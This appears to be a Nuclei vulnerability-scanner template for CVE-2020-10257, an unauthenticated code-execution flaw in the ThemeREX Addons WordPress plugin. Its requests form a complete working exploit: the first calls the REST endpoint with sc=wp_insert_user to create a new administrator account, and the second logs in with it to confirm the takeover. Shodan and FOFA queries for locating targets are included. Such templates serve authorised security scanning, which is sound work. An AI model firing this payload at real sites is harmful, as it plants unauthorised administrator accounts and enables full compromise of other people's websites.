id: CVE-2020-10257

info:
  name: ThemeREX Addons - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    ThemeREX Addons plugin before 2020-03-09 for WordPress contains an access control vulnerability in the /trx_addons/v2/get/sc_layout REST API endpoint: includes/plugin.rest-api.php calls trx_addons_rest_get_sc_layout with an unsafe sc parameter, so any user can execute arbitrary PHP functions. Exploitation requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP functions, potentially leading to remote code execution and full site compromise.
  remediation: |
    Update to version 2020-03-09 or later to fix the access control issue.
  reference:
    - https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/
    - https://wpscan.com/vulnerability/4ed4e60e-5bbb-4010-a7fe-40eadd8dee64/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10257
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10257
    epss-score: 0.6663
    epss-percentile: 0.98558
    cwe-id: CWE-94
    cpe: cpe:2.3:a:themerex:addons:1.70.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    product: themerex
    framework: wordpress
    shodan-query: 'http.html:trx_addons'
    fofa-query: 'body=trx_addons'
  tags: cve,cve2020,rce,wordpress,wp-plugin,wp,themerex,unauth,vkev

variables:
  username: '{{rand_text_alpha(6)}}'
  password: '{{rand_text_alpha(6)}}'

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login={{username}}&user_pass={{password}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"data\":")'
          - 'status_code==200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code==302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
# digest: 490a0046304402204222a72dc5c1039e7a77d635b9b47c4f409ab5d6480f6ec00eef84cad9fcb02e022052be8ad7424eb72dc3ae4de5a923248d8a48dc4fd3e82d9b34d1a08de0ab38aa:922c64590222798bb761d5b6d8e72950